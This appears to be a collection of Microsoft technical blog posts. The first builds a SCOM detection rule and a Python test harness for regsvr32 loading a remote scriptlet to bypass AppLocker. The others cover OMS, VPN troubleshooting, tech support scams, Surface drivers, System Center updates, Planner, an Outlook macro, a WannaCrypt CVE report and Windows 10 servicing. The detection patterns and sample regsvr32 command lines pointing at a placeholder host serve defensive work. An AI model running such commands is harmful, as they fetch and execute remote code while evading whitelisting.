
Using SCOM to Capture Registering Remotely Located DLL Files

I’ve started browsing some sites that are cataloguing known attack vectors and came across this particular vulnerability, which is worth discussing. Many seasoned IT pros understand the use of RegSvr32 to register DLL files. This executable is integral to Windows, as it registers DLLs for OS and application use. A little-known flaw is that it can be used to load DLL files that are not contained on the server itself, thus bypassing antivirus detection. We’ve already built one rule set based off this flaw for a known attack method, which is documented here. In this particular case, we are looking for a method to bypass AppLocker. The attacker loads a DLL file called scrobj.dll from a remote location. While this is beneficial in detecting a known attack, this attack method can easily be altered, as the names of DLL files can be changed on recompile.

That said, the method itself is not quite as easy to adjust. The attacker must use a URL, which allows us to create a rule set in SCOM that audits process creation looking for that specific information. The criteria are fairly straightforward:

  • Event ID = 4688
  • Parameter 9 contains either of these strings:
      • /s /n /u /i:http://
      • /s /n /u /i:https://

For the purpose of this rule, I’m not continuing to filter by regsvr32.  That keeps me out of playing around with case sensitivity when matching a pattern.  The switches and URL call should match.

A more thorough explanation of what is going on with this method of attack can be found at this location.

I would note that while Antivirus cannot catch this method, EMET is a mitigation for it.  If EMET is not configured for your environment though, this rule set targeted towards Windows Servers and EventCollectors should work if you have them enabled.

With that said, I’m testing this in my lab presently and plan on including it in the next release of the Security Monitoring Management Pack. I’m not expecting much in terms of noise, but if by chance you have a legitimate application that is using this method, you can choose to add a Parameter 9 ‘does not contain’ <insert name of DLL here> condition to the AND portion of this rule. That will eliminate any noise associated with known applications.
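As an added example (not code from the original post or the management pack), the following Python re-implements the rule criteria above, including the optional ‘does not contain <DLL>’ exception, and runs them offline over constructed 4688 events in the Windows event XML layout; the host names, user names and the legitapp.dll name are placeholders.

```python
# Added example (not part of the original post): a stand-alone re-implementation of the
# SCOM rule logic described above, run offline over constructed sample Security events.
# It checks the same criteria the rule uses (Event ID 4688, Parameter 9 containing either
# switch string) plus the optional "Parameter 9 does not contain <DLL>" exception.
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVENT_NS = "http://schemas.microsoft.com/win/2004/08/events/event"
NS = {"e": EVENT_NS}

# The two strings the post's rule looks for in Parameter 9 (the command line of a 4688 event).
RULE_PATTERNS = ("/s /n /u /i:http://", "/s /n /u /i:https://")


def make_event(event_id, command_line, new_process):
    """Build a minimal, constructed Security event in the Windows event XML layout.

    The <Data> elements follow the 4688 field order, so the ninth one is the
    command line, which is what SCOM exposes as Parameter 9.
    """
    fields = [
        ("SubjectUserSid", "S-1-5-21-0-0-0-1001"),  # constructed placeholder SID
        ("SubjectUserName", "labuser"),             # constructed placeholder user
        ("SubjectDomainName", "LAB"),
        ("SubjectLogonId", "0x3e7"),
        ("NewProcessId", "0x1a2c"),
        ("NewProcessName", new_process),
        ("TokenElevationType", "%%1938"),
        ("ProcessId", "0xd70"),
        ("CommandLine", command_line),
    ]
    data = "".join(f'<Data Name="{n}">{escape(v)}</Data>' for n, v in fields)
    return (f'<Event xmlns="{EVENT_NS}"><System><EventID>{event_id}</EventID>'
            f'<Channel>Security</Channel></System><EventData>{data}</EventData></Event>')


def event_id(event_xml):
    """Return the numeric Event ID from the <System> section."""
    return int(ET.fromstring(event_xml).find("e:System/e:EventID", NS).text)


def parameter(event_xml, n):
    """Return Parameter n (1-based, as SCOM numbers them), or "" if the event has fewer."""
    data = ET.fromstring(event_xml).findall("e:EventData/e:Data", NS)
    return (data[n - 1].text or "") if len(data) >= n else ""


def rule_matches(event_xml, excluded_dlls=()):
    """Apply the post's criteria: Event ID 4688 AND Parameter 9 contains one of the
    switch strings AND (exception) Parameter 9 does not contain an allow-listed DLL name.

    Matching is case-insensitive in this example; the process name is deliberately
    not checked, exactly as the post's rule does not filter on regsvr32.
    """
    if event_id(event_xml) != 4688:
        return False
    p9 = parameter(event_xml, 9).lower()
    if not any(pat in p9 for pat in RULE_PATTERNS):
        return False
    return not any(dll.lower() in p9 for dll in excluded_dlls)


def run_rule(events, excluded_dlls=()):
    """Return the Parameter 9 value of every event that would raise the alert."""
    return [parameter(e, 9) for e in events if rule_matches(e, excluded_dlls)]


REGSVR32 = r"C:\Windows\System32\regsvr32.exe"
# Constructed sample events (.invalid host names are placeholders, not real indicators).
SAMPLE_EVENTS = [
    make_event(4688, "regsvr32.exe /s /n /u /i:http://host.invalid/item scrobj.dll", REGSVR32),
    # same pattern in upper case: still caught because matching is case-insensitive
    make_event(4688, "REGSVR32 /S /N /U /I:HTTPS://host.invalid/item", REGSVR32),
    # hypothetical legitimate application using the same switches with its own DLL
    make_event(4688, "regsvr32.exe /s /n /u /i:https://intranet.invalid/cfg legitapp.dll", REGSVR32),
    # ordinary process start: no switch string, no alert
    make_event(4688, r"notepad.exe C:\notes.txt", r"C:\Windows\System32\notepad.exe"),
    # same text under a different Event ID: fails the first criterion, no alert
    make_event(4689, "regsvr32.exe /s /n /u /i:http://host.invalid/item scrobj.dll", REGSVR32),
]

if __name__ == "__main__":
    print("Alerts without exception:", run_rule(SAMPLE_EVENTS))
    print("Alerts with 'does not contain legitapp.dll':",
          run_rule(SAMPLE_EVENTS, excluded_dlls=("legitapp.dll",)))
```

The second run shows how the ‘does not contain’ exception silences the known application while the two other matches still alert.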


Microsoft Service Trust Preview: Cloud needs trust

“Companies and users will only adopt technology if they can trust it.” So said Microsoft CEO Satya Nadella, and he is of course right. That is exactly why we do everything we can so that customers place their trust in our cloud offerings, because we do not take that trust for granted.

Another building block of trust is our Service Trust Preview website. It is available free of charge to all cloud customers and delivers the following information and documents.

  1. Reports from certification audits such as ISO or SOC for the various Microsoft cloud offerings such as Azure, Office 365, Dynamics 365, Power BI or Yammer. The reports covering Microsoft Cloud Deutschland are also included.
  2. Technical white papers and FAQs that explain our security mechanisms and how they are implemented, including explanations of the data trustee of Microsoft Cloud Deutschland and the Cloud Control Center.
  3. A compliance guide that helps customers handle the security and compliance mechanisms for which they themselves are responsible.

Certifications of Microsoft Cloud Deutschland

Microsoft Cloud Deutschland (MCD) has gone through several certification procedures. Service Trust Preview provides detailed documents for each of these certifications (see the list below). Further documents explaining technical details of MCD are also available, and the collection is continuously being expanded.

Guest post by Michael Kranawetter, National Security Officer (NSO) at Microsoft Germany. On his own blog, Michael publishes everything worth knowing about vulnerabilities in Microsoft products and the software updates released for them.

Verify OMS Managed Computers


Ever wondered what objects are set up for OMS?

Maybe you’ve seen lots of errors on servers you don’t expect?

It’s possible someone chose a group, or nearly all managed computers in your SCOM environment.

How do we verify, or change, which computers send data to OMS from SCOM?

1) Look for a group

In the SCOM console, Monitoring tab, look for the ‘Advisor’ group. Maybe someone put a group in there.

2) Verify OMS members

In the SCOM console, Administration tab, click on Managed Computers. The middle pane shows what is currently set up.

3) Update OMS managed computers

In the SCOM console, Administration tab, click on Managed Computers; the middle pane shows what is currently set up.

Click the ‘Add a computer/group’ link in the Tasks pane (right side).

Add computers or groups: enter a keyword, click Search, highlight the result and click Add.

Click OK when done updating members.

Optionally, highlight a member and click Delete to remove it.

4) Verify the Advisor MPs on the computer

Go to the server (added or removed).

If added, look for 1201 events in the Operations Manager log.

If removed, look for 1204 events in the Operations Manager log.

Enjoy!!

RDP not working over Azure S2S VPN with Palo Alto


I ran into an interesting issue with a customer this week. We were deploying a route-based VPN from Azure Resource Manager to the customer’s Palo Alto PA-5020 running PANOS 7.1.8. We were able to stand up the VPN tunnel easily enough, but we could not RDP to VMs running in Azure using the VPN, while RDP using the public IP worked. We could open port 3389 via a telnet command, but RDP would time out. When running a network trace we saw a fair amount of re-transmits, so as a troubleshooting step we lowered the MTU to account for VPN overhead. This didn’t help for our use case. The fix turned out to be selecting “Enable NAT Traversal” (the VPN device was not behind a NAT) on the IKE gateway.

MTU Setting: (screenshot)

NAT Setting: (screenshot)

We don’t (yet) have a good reason as to why this setting solved the RDP issue. I’ll comment on this when I know, and if you have some ideas, please feel free to comment.

The fight against tech support scams


This article is a translation of the post “The fight against tech support scams” by Courtney Gregoire of the Microsoft Digital Crimes Unit (published May 18, 2017, US time).

Throughout this month, I am taking part in a series of “unmask the scammers” events together with AARP, the Federal Trade Commission (FTC), Washington State Attorney General Bob Ferguson and Boeing Employees Credit Union (BECU) to teach consumers in Washington how to spot and avoid tech support scams.

Seniors are not the only targets of scammers. Even if you have not yet experienced a tech support scam yourself, you have probably heard of someone who has. According to a 2016 global survey, two out of three people experienced a tech support scam in the past 12 months.

Cybercriminals deceive consumers in many ways, including cold calls, web advertisements and persistent, annoying pop-up windows. The worldwide network linking these scammers makes extensive use of marketing specialists who trade and sell consumer information to obtain leads, payment processors who hide the flow of money from investigators, call-center operations large and small around the world whose staff are trained to convince customers they have technical problems that do not exist, and software developers who create fake tools that are installed on consumers’ computers to raise bogus alerts and pretend to “clean up” problems that never existed.

An example of a recent fraudulent pop-up advertisement used by cybercriminals to deceive consumers

Microsoft’s approach

Microsoft’s Digital Crimes Unit (DCU) fights the cybercrime that befalls people in this way by (1) investigating tech support scam networks with a data-driven approach and referring them for legal action where appropriate, (2) strengthening technology to protect consumers more reliably from the various scam techniques, and (3) educating consumers on how to stay safe online.
Microsoft asks customers to report their experiences with tech support scams directly at http://www.microsoft.com/reportascam. These reports often contain phrases such as “I am filing this on behalf of my 90-year-old grandmother” or “My grandmother was playing solitaire on Facebook when a pop-up appeared telling her the computer was infected with a virus and to call a number.” These individual reports are important, but on their own they are unlikely to support legal action. Microsoft’s data analytics team uses advanced tools to sort and group the information and build a more comprehensive picture of the scope of the scams. The DCU works with groups such as Microsoft’s Artificial Intelligence & Research (AI&R) to enrich this data. Together we have built a process that captures images of the pop-ups being displayed around the world and uses machine learning to gather key information in support of legal cases.

Addressing the scale and scope of tech support scams requires an all-hands approach. That is why we regularly convene an industry-wide investigative working group with representatives from companies such as Apple, Dell, Yahoo and HP. To tackle the persistent problem of robocall and telemarketing scams, Microsoft participates in the Robocall Strike Force. And we continue to work with telecommunications companies, payment processors, web hosting companies and others to fight tech support scams.

Global efforts to counter tech support scams

On Friday, May 12, I was pleased to see legal action taken against many of the tech support scammers that Microsoft’s DCU had been targeting. As part of this coordinated effort, the Federal Trade Commission and its partners announced 16 new actions, including complaints, settlements, indictments and guilty pleas related to fraudulent tech support operations. Seven individuals were criminally charged for their involvement in a fraudulent operation at Client Care Experts in Florida. From approximately November 2013 to 2016, more than 40,000 people fell victim to Client Care Experts and more than 25,000,000 US dollars were taken from them.

We know that cybercriminals are not constrained by geopolitical borders. The DCU leverages Microsoft’s global organization, from Germany to Singapore and from Canada to India, to investigate fraud and fight cybercrime. In November 2016 I joined a delegation to India with representatives of the US Department of Justice and the Federal Trade Commission. Its purpose was to speak directly with law enforcement about the urgency of addressing call-center fraud, and to discuss the reputational damage that ongoing call-center fraud inflicts on people working in the business process industry. In addition to filing cases directly, Microsoft India has supported cybercrime training for 385 law enforcement officers and more than 400 prosecutors over the past year.

Cybercrime training for prosecutors and judicial officers, January 22, 2017, at the Maharashtra Judicial Academy in Mumbai, India.

These efforts are beginning to bear fruit. Last fall, Indian law enforcement raided 12 call centers involved in scams primarily targeting US consumers, including notorious scams impersonating the IRS and tech support. Microsoft will continue to leverage its global team to investigate cybercriminals who target consumers and refer them for legal action where appropriate. At the same time, international law enforcement agencies need to commit significant resources to confront these borderless, ever-evolving crimes.

Building a safer platform

Microsoft applies what it learns about cybercriminal behavior to improve its products for customers. Windows 10 offers built-in protections, including more security features, safer authentication and continuous updates throughout the supported lifetime of a device. Windows Defender provides comprehensive, real-time protection against software threats across email, the cloud and the web. The SmartScreen filter built into Windows, Microsoft Edge and Internet Explorer protects against malicious websites and downloads, including those annoying pop-up windows. And in 2016 Bing blocked more than 17 million fraudulent tech support advertisements.

The most effective way to protect yourself from scams is to learn about them. If you receive a notification or call from someone claiming to be from a trusted software company, keep the following in mind.

  • Be wary of unsolicited phone calls and pop-up messages on your device.
  • Microsoft will never send unsolicited communications to your computer or proactively offer technical support you did not request. Communication between Microsoft and a customer begins only when the customer initiates it.
  • Do not call a phone number shown in a pop-up window on your device. Microsoft error messages and warnings never include a phone number.
  • Never give a third party control of your computer unless you can verify that they are a legitimate representative of the support team of a computer company with which you are already a registered customer.
  • If in doubt, write down the caller’s information and report it to your local authorities immediately.

For more information on protecting yourself from tech support scams, see the following.

Updates for Surface Pro 4 (25 May 2017)


Today we’ve released updated drivers for the Surface Pro 4. These include the Surface System Aggregator Firmware, Intel(R) Precise Touch Device, and Surface Integration drivers that we released last month for devices with Windows 10 Version 1703 (Creators Update), now available for Windows 10 Version 1607 (Anniversary Update) and Windows 10 Version 1511 (November Update). We’ve also updated the drivers for Surface Embedded Controller Firmware, Surface Touch Servicing ML, Surface Touch, and Surface UEFI. These updates resolve screen brightness issues when devices come out of sleep, refine brightness settings, optimize touch functionality, adjust hibernation defaults, disable touch when the cover is closed, and provide improvements to stability and battery life during sleep.

For Surface Pro 4, the updates are available in MSI and ZIP format from the Surface Pro 4 Drivers and Firmware page in the Microsoft Download Center. Click Download to download the following files:

  • SurfacePro4_Win10_15063_1702001_0.msi
  • SurfacePro4_Win10_15063_1702001_1.zip
  • SurfacePro4_Win10_10586_1702001_0.msi
  • SurfacePro4_Win10_10586_1702001_1.zip

Note: On the download page, you will notice that there are multiple versions of the ZIP and MSI files. Each of these files includes in the name a Windows 10 build number indicating the minimum supported build required to install the drivers and firmware contained within. For example, to install the drivers contained in SurfaceBook_Win10_15063_1702001_0.msi you must have Windows 10 Creators Update (Version 1703) or newer installed on your Surface Book device. You can find a list of the build numbers for each version of Windows 10 in Windows 10 release information. Files that do not contain a build number in their name are applicable to all versions of Windows 10.

Surface Pro 4

  • Surface Embedded Controller Firmware (v103.1684.256.0) improves battery life during sleep.
  • Intel(R) Precise Touch Device (v1.2.0.83) disables touch when the cover is closed and improves stability.
  • Surface Integration (v1.0.121.0) adjusts system hibernation defaults.
  • Surface Touch Servicing ML (v1.0.724.0) updates touch functionality.
  • Surface System Aggregator Firmware (v103.1610.256.0) resolves screen brightness issues when the device comes out of sleep.
  • Surface UEFI (v106.1624.768.0) refines brightness settings.
  • Surface Touch (v57.1.1.1) optimizes touch functionality.

Seize your opportunity by earning a Microsoft Certification for Windows 10 [updated 5/26]


 

Microsoft certifications provide globally recognized, industry-endorsed proof that you have mastered the required skills; they demonstrate your abilities and show that you are willing to embrace new technologies.

Earn a Microsoft Certification and seize your opportunity.

A skill-up campaign is currently running in which you can receive Microsoft logo goods and certification logo goods.

The Windows 10 related certifications are MCSA: Windows 10 and MCSE: Mobility.

MCSA: Windows 10

This certification proves that you have the expertise to configure, manage and support Windows 10 enterprise systems (if you have little IT experience, aim first for the entry-level MTA certification).

Earning the MCSA: Windows 10 certification shows that you are qualified for a position as a computer support specialist.

Required exams:

70-698 Installing and Configuring Windows 10

70-697 Configuring Windows Devices

Official hands-on training

23697-1B Installing and Configuring Windows 10, offered by Global Knowledge and NEC Management Partner

Deploying and Managing Windows 10 Using Enterprise Services, offered by Global Knowledge

Books

徹底攻略MCP問題集 Windows 10 [70-698: Installing and Configuring Windows 10] 対応 (Impress)

徹底攻略MCP問題集 Windows 10 [70-697: Configuring Windows Devices] 対応 (Impress)

MCP教科書 Windows 10 (試験番号: 70-697) スピードマスター問題集 (Shoeisha)

MCP教科書 Windows 10 (試験番号: 70-697) (Shoeisha)

MCSE: Mobility

The MCSE: Mobility certification demonstrates that you have the skills needed to manage devices in today’s Bring Your Own Device (BYOD) enterprise. It qualifies you for a range of career paths, from traditional desktop support technician to managing BYOD devices and apps in the enterprise.

This MCSE certification does not expire and does not need to be renewed. However, you can re-earn the certification each calendar year to add an entry to your transcript. To do so, you need to pass a unique exam from the list of elective exams. This demonstrates your continued investment in broadening or deepening your skills in a specific technology area.

After earning MCSA: Windows 10, pass one of the following elective exams during 2017.

70-695 Deploying Windows Desktops and Enterprise Applications

70-696 Administering System Center Configuration Manager and Intune

70-398 Planning for and Managing Devices in the Enterprise

Official hands-on training

20695 Deploying Windows Desktops and Enterprise Applications

23696 Administering System Center Configuration Manager and Intune (Global Knowledge)

Update Rollup 3, the latest hotfix package for System Center 2016, has been released!!


Hello, this is 益戸 from the System Center Support Team at Microsoft Japan.

We are pleased to announce that Update Rollup 3 (UR3) for System Center 2016 was released on May 24, 2017.

Update Rollup 3 for System Center 2016
https://support.microsoft.com/ja-jp/help/4020906/update-rollup-3-for-system-center-2016
This release provides fixes for the following products. The fixes can be downloaded and installed via Microsoft Update. In offline environments, packages downloaded through the Microsoft Update Catalog can also be applied manually. For detailed installation steps and the list of fixes, refer to the respective links.
・Operations Manager (KB4016126)
https://support.microsoft.com/ja-jp/help/4016126/
* After applying the update, registry changes, SQL script execution, management pack imports and so on are required.
・Service Manager (KB4019979)
https://support.microsoft.com/ja-jp/help/4019979
* After applying the update, some files need to be modified.
・Virtual Machine Manager (KB4014528)
https://support.microsoft.com/ja-jp/help/4014528
* For points to note when applying an Update Rollup, also refer to the following articles.

How to install, remove, or verify update rollups for Virtual Machine Manager 2012 R2
https://support.microsoft.com/kb/3066343

How to Update the VMM Agent
https://technet.microsoft.com/ja-jp/library/hh430984.aspx

Points to note when applying a VMM 2012 R2 Update Rollup
http://blogs.technet.com/b/systemcenterjp/archive/2015/07/28/3652622.aspx

This post is just the release announcement. Please consider applying the update.


Update Rollup 13, the latest hotfix package for System Center 2012 R2, has been released!!


Hello, this is 益戸 from the System Center Support Team at Microsoft Japan.

We are pleased to announce that Update Rollup 13 (UR13) for System Center 2012 R2 was released on May 24, 2017.

Update Rollup 13 for System Center 2012 R2
https://support.microsoft.com/ja-jp/help/4020917/update-rollup-13-for-system-center-2012-r2
This release provides fixes for the following products. The fixes can be downloaded and installed via Microsoft Update. In offline environments, packages downloaded through the Microsoft Update Catalog can also be applied manually. For detailed installation steps and the list of fixes, refer to the respective links.

・Data Protection Manager (KB4021873)
https://support.microsoft.com/ja-jp/help/4021873
* After applying the update, the agents must be upgraded. Depending on the version you are using, a restart is required after the agent upgrade.

・Operations Manager (KB4016125)
https://support.microsoft.com/ja-jp/help/4016125
* After applying the update, registry changes, SQL script execution, management pack imports and so on are required.
Note also that the update must be applied in a specified order.

・Virtual Machine Manager (KB4014525)
https://support.microsoft.com/ja-jp/help/4014525
* For points to note when applying an Update Rollup, also refer to the following articles.

How to install, remove, or verify update rollups for Virtual Machine Manager 2012 R2
https://support.microsoft.com/kb/3066343

How to Update the VMM Agent
https://technet.microsoft.com/ja-jp/library/hh430984.aspx

Points to note when applying a VMM 2012 R2 Update Rollup
http://blogs.technet.com/b/systemcenterjp/archive/2015/07/28/3652622.aspx

This post is just the release announcement. Please consider applying the update.

Please note that mainstream support for System Center 2012 R2 ends on July 11, 2017.
After mainstream support ends, design changes and new feature requests can no longer be accepted, and in many cases we will no longer be able to accept requests even when defects occur.

To continue using the product with confidence, please consider upgrading to System Center 2016.

Product lifecycle (System Center 2012 R2)
https://support.microsoft.com/ja-jp/lifecycle/search?alpha=Microsoft%20System%20Center%202012%20R2

Lifecycle FAQ – General policy questions
https://support.microsoft.com/ja-jp/help/17140/lifecycle-faq-general-policy-questions

Microsoft Office 365 in education. Group work in Microsoft Planner


Author of the article: Vitaliy Vedenev.

With the Microsoft Planner planner included in Office 365 [1], and with the new ability to assign several people to one task [2], it is now possible to set tasks collectively during educational project work, to organize brainstorming in a new way, and so on.

What will you know and be able to do after reading this article?

– How to organize the collective completion of tasks and assignments with Microsoft Planner in Microsoft Teams and in an Office 365 group.

I have already covered questions related to organizing learning in an Office 365 group [1,3].

Planner is a service that complements this well with a visual way of presenting the progress of learning tasks.

Let us look at several examples of organizing learning in a group using the ability to assign several people to one task.

Scenario 1. Assigning tasks to subgroups of a class with Microsoft Planner in Microsoft Teams

The second scenario of the article Microsoft Office 365 in education. Options for organizing learning in Microsoft Teams chat. Continued (https://blogs.technet.microsoft.com/tasush/2017/04/21/varianty-organizacii-obuchenija-v-chate-microsoft-teams-prodolzhenie/) walks through planning project activities in a Microsoft Teams team [3].

Let us look in more detail at the sequence for assigning tasks to learners in a subgroup of the project group:

(figure: o365-36-04-may17-01)

What the diagram shows:

  1. The figure shows a task being assigned with Planner in a channel of a Microsoft Teams team.
  2. To do this, the teacher needs to add a Planner tab to the channel (in the example: “Topic 1. Planning”) using an existing plan.
  3. In the Planner window that appears, tasks can be assigned: enter the task name, set the due date, and assign the group members of the specific subgroup from the drop-down list.
  4. Then click the “Add task” button and fill in all the required fields in the task window (Assignment). After text is entered in the notes, email messages are sent out automatically.
  5. Each member of the subgroup can view the task information in the Planner of their personal profile. A message from Planner will inform you that this is a task for the group (in the example, the subgroup).

Scenario 2. Assigning tasks to subgroups of a class with Microsoft Planner from the Office 365 group’s planner

You can plan learning activities and create tasks for subgroups directly from the Office 365 group’s planner [4].

To do this, the teacher:

  1. In Outlook, finds the Office 365 class group (in the example, “9а”) and goes to “More” in the group menu.
  2. Selects “Planner” from the list that opens.
  3. Switches to Planner and, on the “Board”, creates a task for the subgroup by analogy with scenario 1 (in the same sequence).
  4. A visual display of the progress of the assignments (tasks) can be viewed right there, in Planner (Planner Hub), on the chart.

(figure: o365-36-04-may17-02)

Both scenarios covered different ways of creating (planning) group assignments in an Office 365 group.

Sources:

  1. Microsoft Office 365 in education. Organizing learning activities in Office 365 with the new Planner service
  2. Assigning several people to one task in Microsoft Planner
  3. Microsoft Office 365 in education. Options for organizing learning in Microsoft Teams chat. Continued
  4. Microsoft Office 365 in education. New options for organizing learning in an Office 365 group

Tip o’ the Week 379 – Delay mail, revisited


A couple of years ago, ToW #282 covered how to delay your mail from being sent, by forcing Outlook to work offline, by selectively delaying individual messages or even by adding a rule to ensure that every one is held up. It’s a very useful thing to do, sometimes – a great way to prevent accidental mail sending, or to give you a chance to revise stuff you’ve sent after maybe reading newer emails in your inbox.

This tip presents a refinement of the process as there is a downside to automatically delaying everything – namely, if you’re in a hurry to go somewhere but you need a mail to be fired off beforehand, it can be annoying to have to hang around for the enforced delay to expire before you can safely pack up and head out.

You will need to do a bit of digging around inside Outlook dialogs, so it may help to park this on a 2nd screen, copy to a Word doc or something…

What we’re going to do is set up a rule to delay all outgoing email – except mail with a particular category assigned to it, so that will be sent immediately. If you know you want the mail you’re about to send to go right now, then you could manually set the category before you hit send, and it will leave straight away.


  1. Go into Rules in the main Outlook window (either from the menu, or just search for Rules in the “Tell me what you want to do” box), and select the Manage Rules & Alerts option.
  2. To create a new rule to delay mail (if you’ve already got one as per ToW #282, then edit it to do the same), try adding one that applies to messages you send, then don’t choose any conditions (and accept that it will fire on all messages); then, when asked for exceptions, set a condition so that it won’t apply if a particular category is set (e.g. create a Category called NODELAY or SENDNOW or something). The categorisation will still be visible in your Sent Items folder, but the recipient won’t see it.
  3. Set the delay time (in minutes) and apply the rule; try it out with a blank, uncategorised mail to yourself and you should see it sit in the Outbox folder for a few minutes before being sent. Now try to send another message and set the category manually, and you should see it arrive quickly. To set the category on an outgoing message, look in the message properties before hitting send – either from the Tags group in the ribbon, or File | Properties on the menu of the message window.

This is all very well if you remember to go in and set the category before you hit send. If you regularly have an Outbox full of stuff waiting to go and you’re truly adventurous, you could add a macro to Outlook to automatically flush the queue. Press ALT+F8 to get to the Macro settings; if prompted to run or create a macro, create a new one called SendNow and paste the following into the code window:

Sub sendNow()
    ' Remember the folder currently shown so it can be restored afterwards
    Set CurrentFolder = Application.ActiveExplorer.CurrentFolder
    ' Switch the active explorer to the Outbox, where the delayed mail is waiting
    Set Application.ActiveExplorer.CurrentFolder = _
        Application.GetNamespace("MAPI").GetDefaultFolder(olFolderOutbox)
    Set omsgs = Application.ActiveExplorer.CurrentFolder.Items
    For Each omsg In omsgs
        ' Move the deferred delivery time into the past so the message is no longer held
        omsg.DeferredDeliveryTime = Now() - 1
        ' Tag the message with the category the delay rule treats as an exception
        If omsg.Categories = "" Then omsg.Categories = "NODELAY"
        omsg.Send
    Next
    ' Put the explorer back on the folder the user was looking at
    Set Application.ActiveExplorer.CurrentFolder = CurrentFolder
End Sub

After saving/exiting from the Macro editor, you might want to add a shortcut to your new macro to the Quick Access Toolbar in the main Outlook window. When you add the command to the list on the right-hand side of the dialog, you can modify the button to give it a snazzier icon and a name that means something.


Security Focus: Get CVE Information for WannaCrypt


You’ve no doubt heard that the WannaCrypt ransomware is also a worm. The propagation code exploits a patched SMB vulnerability – CVE-2017-0145.

How can we use PowerShell to create a Common Vulnerabilities and Exposures (CVE) report for that vulnerability?

 


# Store the MSRC API key for this session (replace the X's with your own key)
Set-MSRCApiKey -ApiKey XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

# Retrieve the CVRF document for the March 2017 security updates
$cvrfDoc = Get-MsrcCvrfDocument -ID 2017-Mar

# Pick out the CVE-2017-0145 entry and keep the product tree so product names resolve
$Properties = @{
    Vulnerability = ($cvrfDoc.Vulnerability | Where-Object {$_.CVE -like "CVE-2017-0145"})
    ProductTree   = $cvrfDoc.ProductTree
}

# Splat the parameters into the report cmdlet and write the HTML file
Get-MsrcVulnerabilityReportHtml @Properties | Out-File -FilePath CVE-2017-0145.html

 

Have a look here for details of how to obtain the MsrcSecurityUpdates PowerShell module.

Input your MSRC API key. You can obtain one from here.

Now, request the Common Vulnerability Reporting Framework (CVRF) document for the March 2017 update (it contains MS17-010, which patches the SMB vulnerability). Parse the document for CVE-2017-0145 and then splat the collected information into the Get-MsrcVulnerabilityReportHtml cmdlet to generate an HTML report.

 


 

Want all of the CVEs that MS17-010 patches? Try this tweak…

 


Vulnerability = ($cvrfDoc.Vulnerability | Where-Object {$_.CVE -like "CVE-2017-014[3-8]"})

Customer Guidance for WannaCrypt attacks

Windows 10 as a Service – Managing Feature Updates


Questo articolo è parte di una serie che vuole parlare dei concetti di Windows come Servizio

 

E’ uscita una nuova build, come faccio ad adottarla?

Come detto negli articoli precedenti, Microsoft crea due Feature Updates (le build) due volte l’anno, a Marzo e Settembre, rilasciandole tramite i suoi canali nel mese successivo alla fine dello sviluppo (quindi in Aprile e Ottobre).

I canali da cui è possibile ricevere queste build sono Windows Update e il sito Volume License (per chi ha acquisito la licenza E3 o E5 di Windows).

Riguardo agli strumenti di aggiornamento, è possibile utilizzare:

  • Windows Update/Windows Update for Business
  • Windows Server Update Services (WSUS)
  • System Center Configuration Manager (SCCM)
  • Tool di terze parti similari a SCCM

 

Windows Update/Windows Update for Business

I features update vengono rilasciati come pacchetti di aggiornamento da Windows Update.

Ho quindi la possibilità di lasciare che il device contatti Windows Update, si accorga dell’aggiornamento, lo scarichi e lo applichi.

Per evitare un riavvio indesiderato, meglio impostare correttamente “l’orario attività” presente nel nuovo pannello di controllo nella sezione “Aggiornamento e sicurezza”.

Orario attività Windows 10

E’ inoltre possibile configurare se si vuole ricevere subito una build (ramo Current Branch) o attendere 4 mesi dal rilascio (ramo Current Branch for Business). Ci sono altre opzioni interessanti compresa quella della sospensione temporanea (fino a 7 giorni) degli aggiornamenti.

Si trova tutto nella sezione “Aggiornamenti Avanzati”

Aggiornamenti opzioni avanzate

E’ inoltre possibile risparmiare traffico di rete utilizzando la feature Delivery Optimization che permette la condivisione degli aggiornamenti tra macchine vicine. Ne ho parlato in questo articolo a proposito dei Quality Updates.

Sempre nello stesso articolo ho parlato di Windows Update for Business che altro non è che una serie di policy (Group policy o MDM policy) che comandano il device a prendersi un aggiornamento (Quality o Feature) dopo x-giorni dalla pubblicazione.

Sarà quindi possibile impostare un gruppo di macchine pilota che installerà l’aggiornamento da Windows Update il giorno stesso della sua disponibilità, un altro gruppo che lo installerà qualche giorno dopo e così via andando per scaglioni.

Se utilizzo un Mobile Device Manager tool tipo Intune per gestire il mio Windows 10, gli aggiornamenti comprese i Features Updates verranno presi da Windows Update for Business e ci penserà la policy MDM a gestire le opzioni disponibili.

 

Windows Server Update Services

Se si utilizza WSUS, la build verrà comunque trattata come se fosse una patch. WSUS supporta sia Branch Cache (feature di Windows 10 Enterprise) che Delivery Optimization per ottimizzare la banda utilizzata.

 

System Center Configuration Manager

SCCM ha una sua sezione specifica chiamata “Windows 10 Servicing” che permette di:

  • Avere delle dashboard in grado di fornire informazioni su quanti e quali sistemi utilizzano una certa build
  • Creare dei Servicing Plan

System Center Configuration Manager Windows 10 Servicing

I Servicing Plan permettono di automatizzare l’installazione della build andando a definire dei gruppi di adozione (i ring) e le tempistiche di innesco dell’installazione.

SCCM permette l’utilizzo sia di Branch Cache che di Peer Cache per l’ottimizzazione del traffico di rete.

 

Tool di gestione di terze parti

Qui entriamo in un terreno che non è il mio nel senso che conosco abbastanza bene tutta una serie di tool di gestione quali LanDesk, IBM TEM, Symantec Altiris… Ma per quanto riguarda Windows 10, al momento della scrittura di questo articolo, non sono a conoscenza di processi per l’aggiornamento delle build simili a quello descritto qui sopra per SCCM.

Comunque sia, anche che non ci fossero, è sempre possibile innescare l’aggiornamento di una build tramite uno script nel senso che il “motore” di aggiornamento viene scatenato dal classico Setup.exe presente nella ISO di Windows 10 condito da tutta una serie di switch che permettono l’installazione silente.

Per sapere quali sono questi switch, basta da riga di comando eseguire setup.exe /?

Windows 10 Setup.exe options

 

Disk encryption

As a point of attention I would like to raise the subject of disk encryption... Windows 10, both Professional and Enterprise, allows you to use the BitLocker feature included in the operating system (in Windows 7 it was only available in the Enterprise edition), but other third-party solutions are available on the market.

The point of attention is that the operating system upgrade procedure goes through the following process:

  • The files are placed in the local cache of the device to be upgraded
  • The files are unpacked, the boot order is changed and a reboot is performed
  • Windows PE (a minimal version of Windows that works exclusively in RAM) is started automatically
  • Windows PE, working in RAM, sees the disk "from above" and is able to upgrade the operating system

If the encryption is BitLocker, the system knows about it, so it is suspended before the reboot and the upgrade process has no trouble completing.

If, however, the encryption is third-party, it is up to whoever performs the upgrade to take care of pausing/disabling the encryption before triggering the upgrade, otherwise the upgrade will fail.

